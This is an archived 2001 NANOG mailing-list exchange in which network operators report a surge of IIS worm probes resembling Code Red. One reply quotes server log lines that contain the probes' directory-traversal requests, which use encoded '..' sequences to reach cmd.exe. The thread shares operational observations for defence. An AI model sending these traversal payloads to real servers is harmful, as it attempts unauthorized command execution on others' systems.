[42663] in North American Network Operators' Group
RE: Worm probes
daemon@ATHENA.MIT.EDU (Don Lundquist)
Tue Sep 18 17:28:24 2001
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Date: Tue, 18 Sep 2001 10:23:50 -0400
Message-ID: <3ADEEE9B86133B40B083CF72F8B04AC82B5ADF@PEAKCLTNTS03.peak-10.com>
From: "Don Lundquist" <don.lundquist@peak-10.com>
To: <nanog@merit.edu>
Errors-To: owner-nanog-outgoing@merit.edu
Same here....
a lot of activity..... seems to be a pattern closely resembling Code
Red....
- - [18/Sep/2001:09:28:57 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-"
"-"
- - [18/Sep/2001:09:28:57 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-"
"-"
- - [18/Sep/2001:09:28:57 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-"
"-"
- - [18/Sep/2001:09:28:58 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-"
"-"
- - [18/Sep/2001:09:28:58 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-"
"-"
- - [18/Sep/2001:09:28:59 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-"
"-"
- - [18/Sep/2001:09:28:59 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
"-" "-"
- - [18/Sep/2001:09:28:59 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-"
"-"
Don
-----Original Message-----
From: sigma@pair.com [mailto:sigma@pair.com]
Sent: Tuesday, September 18, 2001 9:55 AM
To: nanog@merit.edu
Subject: Worm probes
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
probes this morning? We're seeing about 8000/second, starting around
9:15
Eastern time, to and from a wide variety of addresses.
Is CodeRed or one of its relatives scheduled to start sweeping again
today?
We've never seen this level of traffic related to the NT worms. Even
though we don't run any NT at all, we still have to suffer :(
Kevin
